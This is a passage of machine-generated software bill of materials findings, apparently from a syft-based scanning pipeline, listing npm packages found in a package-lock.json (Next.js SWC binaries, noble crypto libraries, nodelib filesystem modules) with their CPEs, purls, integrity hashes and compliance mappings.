integrity: sha512-0D4/oMM2Y9Ta3nGuCcQN8jjJjmDPYpHX9OJzqk42NZGJocU2MqhBq5tWkJrUQOQY9N+In9xOdymzapM09GeiZw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 6ebdba72ca21b201
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @next/swc-linux-x64-gnu 14.2.3'
title: '@next/swc-linux-x64-gnu 14.2.3'
description: 'Package discovered: @next/swc-linux-x64-gnu 14.2.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 1a0b07449dd69139
name: '@next/swc-linux-x64-gnu'
version: 14.2.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@next\/swc-linux-x64-gnu:\@next\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc-linux-x64-gnu:\@next\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_linux_x64_gnu:\@next\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_linux_x64_gnu:\@next\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc-linux-x64:\@next\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc-linux-x64:\@next\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_linux_x64:\@next\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_linux_x64:\@next\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc-linux:\@next\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc-linux:\@next\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_linux:\@next\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_linux:\@next\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc:\@next\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc:\@next\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40next/swc-linux-x64-gnu@14.2.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@next/swc-linux-x64-gnu/-/swc-linux-x64-gnu-14.2.3.tgz
integrity: sha512-ENPiNnBNDInBLyUU5ii8PMQh+4XLr4pG51tOp6aJ9xqFQ2iRI6IH0Ds2yJkAzNV1CfyagcyzPfROMViS2wOZ9w==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: dc907ac1b205061b
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @next/swc-linux-x64-musl 14.2.3'
title: '@next/swc-linux-x64-musl 14.2.3'
description: 'Package discovered: @next/swc-linux-x64-musl 14.2.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 2ac68dfe221aa840
name: '@next/swc-linux-x64-musl'
version: 14.2.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@next\/swc-linux-x64-musl:\@next\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc-linux-x64-musl:\@next\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_linux_x64_musl:\@next\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_linux_x64_musl:\@next\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc-linux-x64:\@next\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc-linux-x64:\@next\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_linux_x64:\@next\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_linux_x64:\@next\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc-linux:\@next\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc-linux:\@next\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_linux:\@next\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_linux:\@next\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc:\@next\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc:\@next\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40next/swc-linux-x64-musl@14.2.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@next/swc-linux-x64-musl/-/swc-linux-x64-musl-14.2.3.tgz
integrity: sha512-BTAbq0LnCbF5MtoM7I/9UeUu/8ZBY0i8SFjUMCbPDOLv+un67e2JgyN4pmgfXBwy/I+RHu8q+k+MCkDN6P9ViQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 1f0b6c5423b99cbb
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @next/swc-win32-arm64-msvc 14.2.3'
title: '@next/swc-win32-arm64-msvc 14.2.3'
description: 'Package discovered: @next/swc-win32-arm64-msvc 14.2.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: f14dd9ed0ebaa5a4
name: '@next/swc-win32-arm64-msvc'
version: 14.2.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@next\/swc-win32-arm64-msvc:\@next\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc-win32-arm64-msvc:\@next\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_win32_arm64_msvc:\@next\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_win32_arm64_msvc:\@next\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc-win32-arm64:\@next\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc-win32-arm64:\@next\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_win32_arm64:\@next\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_win32_arm64:\@next\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc-win32:\@next\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc-win32:\@next\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_win32:\@next\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_win32:\@next\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc:\@next\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc:\@next\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40next/swc-win32-arm64-msvc@14.2.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@next/swc-win32-arm64-msvc/-/swc-win32-arm64-msvc-14.2.3.tgz
integrity: sha512-AEHIw/dhAMLNFJFJIJIyOFDzrzI5bAjI9J26gbO5xhAKHYTZ9Or04BesFPXiAYXDNdrwTP2dQceYA4dL1geu8A==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: de3c183aece29806
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @next/swc-win32-ia32-msvc 14.2.3'
title: '@next/swc-win32-ia32-msvc 14.2.3'
description: 'Package discovered: @next/swc-win32-ia32-msvc 14.2.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 0272e47fa12e3e5d
name: '@next/swc-win32-ia32-msvc'
version: 14.2.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@next\/swc-win32-ia32-msvc:\@next\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc-win32-ia32-msvc:\@next\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_win32_ia32_msvc:\@next\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_win32_ia32_msvc:\@next\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc-win32-ia32:\@next\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc-win32-ia32:\@next\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_win32_ia32:\@next\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_win32_ia32:\@next\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc-win32:\@next\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc-win32:\@next\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_win32:\@next\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_win32:\@next\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc:\@next\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc:\@next\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40next/swc-win32-ia32-msvc@14.2.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@next/swc-win32-ia32-msvc/-/swc-win32-ia32-msvc-14.2.3.tgz
integrity: sha512-vga40n1q6aYb0CLrM+eEmisfKCR45ixQYXuBXxOOmmoV8sYST9k7E3US32FsY+CkkF7NtzdcebiFT4CHuMSyZw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 42051f1b01ab97d3
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @next/swc-win32-x64-msvc 14.2.3'
title: '@next/swc-win32-x64-msvc 14.2.3'
description: 'Package discovered: @next/swc-win32-x64-msvc 14.2.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 3812cfa26422b0fa
name: '@next/swc-win32-x64-msvc'
version: 14.2.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@next\/swc-win32-x64-msvc:\@next\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc-win32-x64-msvc:\@next\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_win32_x64_msvc:\@next\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_win32_x64_msvc:\@next\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc-win32-x64:\@next\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc-win32-x64:\@next\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_win32_x64:\@next\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_win32_x64:\@next\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc-win32:\@next\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc-win32:\@next\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_win32:\@next\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc_win32:\@next\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc:\@next\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@next\/swc:\@next\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40next/swc-win32-x64-msvc@14.2.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@next/swc-win32-x64-msvc/-/swc-win32-x64-msvc-14.2.3.tgz
integrity: sha512-Q1/zm43RWynxrO7lW4ehciQVj+5ePBhOK+/K2P7pLFX3JaJ/IZVC69SHidrmZSOkqz7ECIOhhy7XhAFG4JYyHA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 22c53c131692682a
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @noble/ciphers 1.3.0'
title: '@noble/ciphers 1.3.0'
description: 'Package discovered: @noble/ciphers 1.3.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: e6d30724fc0ed7cf
name: '@noble/ciphers'
version: 1.3.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@noble\/ciphers:\@noble\/ciphers:1.3.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40noble/ciphers@1.3.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@noble/ciphers/-/ciphers-1.3.0.tgz
integrity: sha512-2I0gnIVPtfnMw9ee9h1dJG7tp81+8Ob3OJb3Mv37rx5L40/b0i7djjCVvGOVqc9AEIQyvyu1i6ypKdFw8R8gQw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: d4d3b15cd9ed667f
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @noble/hashes 1.8.0'
title: '@noble/hashes 1.8.0'
description: 'Package discovered: @noble/hashes 1.8.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 447b3d33bb79ef67
name: '@noble/hashes'
version: 1.8.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@noble\/hashes:\@noble\/hashes:1.8.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40noble/hashes@1.8.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@noble/hashes/-/hashes-1.8.0.tgz
integrity: sha512-jCs9ldd7NwzpgXDIf6P3+NrHh9/sD6CQdxHyjQI+h/6rDNo88ypBxxz45UDuZHz9r3tNz7N/VInSVoVdtXEI4A==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 137b4dda2faad400
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @nodable/entities 2.1.0'
title: '@nodable/entities 2.1.0'
description: 'Package discovered: @nodable/entities 2.1.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: f8f74773abf739cd
name: '@nodable/entities'
version: 2.1.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@nodable\/entities:\@nodable\/entities:2.1.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40nodable/entities@2.1.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@nodable/entities/-/entities-2.1.0.tgz
integrity: sha512-nyT7T3nbMyBI/lvr6L5TyWbFJAI9FTgVRakNoBqCD+PmID8DzFrrNdLLtHMwMszOtqZa8PAOV24ZqDnQrhQINA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 43aa448b0b5207b8
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @nodelib/fs.scandir 2.1.5'
title: '@nodelib/fs.scandir 2.1.5'
description: 'Package discovered: @nodelib/fs.scandir 2.1.5'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 09afc93bd06904eb
name: '@nodelib/fs.scandir'
version: 2.1.5
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@nodelib\/fs.scandir:\@nodelib\/fs.scandir:2.1.5:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40nodelib/fs.scandir@2.1.5
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@nodelib/fs.scandir/-/fs.scandir-2.1.5.tgz
integrity: sha512-vq24Bq3ym5HEQm2NKCr3yXDwjc7vTsEThRDnkp2DK9p1uqLR+DHurm/NOTo0KG7HYHU7eppKZj3MyqYuMBf62g==
dependencies:
'@nodelib/fs.stat': 2.0.5
run-parallel: ^1.1.9
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 562130ed42946717
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @nodelib/fs.stat 2.0.5'
title: '@nodelib/fs.stat 2.0.5'
description: 'Package discovered: @nodelib/fs.stat 2.0.5'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: e6979906f7b5cde7
name: '@nodelib/fs.stat'
version: 2.0.5
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@nodelib\/fs.stat:\@nodelib\/fs.stat:2.0.5:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40nodelib/fs.stat@2.0.5
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@nodelib/fs.stat/-/fs.stat-2.0.5.tgz
integrity: sha512-RkhPPp2zrqDAQA/2jNhnztcPAlv64XdhIp7a7454A5ovI7Bukxgt7MX7udwAu3zg1DcpPU0rz3VV1SeaqvY4+A==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: e2cebc90e3a6fa01
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @nodelib/fs.walk 1.2.8'
title: '@nodelib/fs.walk 1.2.8'
description: 'Package discovered: @nodelib/fs.walk 1.2.8'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: e11d2a355e0d2438
name: '@nodelib/fs.walk'
version: 1.2.8
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@nodelib\/fs.walk:\@nodelib\/fs.walk:1.2.8:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40nodelib/fs.walk@1.2.8
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@nodelib/fs.walk/-/fs.walk-1.2.8.tgz
integrity: sha512-oGB+UxlgWcgQkgwo8GcEGwemoTFt3FIO9ababBmaGwXIoBKZ+GTy0pP185beGg7Llih/NSHSV2XAs1lnznocSg==
dependencies:
'@nodelib/fs.scandir': 2.1.5
fastq: ^1.6.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 371f10bc801b3e8a
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @one-ini/wasm 0.1.1'
title: '@one-ini/wasm 0.1.1'
description: 'Package discovered: @one-ini/wasm 0.1.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 8d849a9c4c0ebd39
name: '@one-ini/wasm'
version: 0.1.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@one-ini\/wasm:\@one-ini\/wasm:0.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@one-ini\/wasm:\@one_ini\/wasm:0.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@one_ini\/wasm:\@one-ini\/wasm:0.1.1:*:*:*:*:*:*:*
source: syft-generated
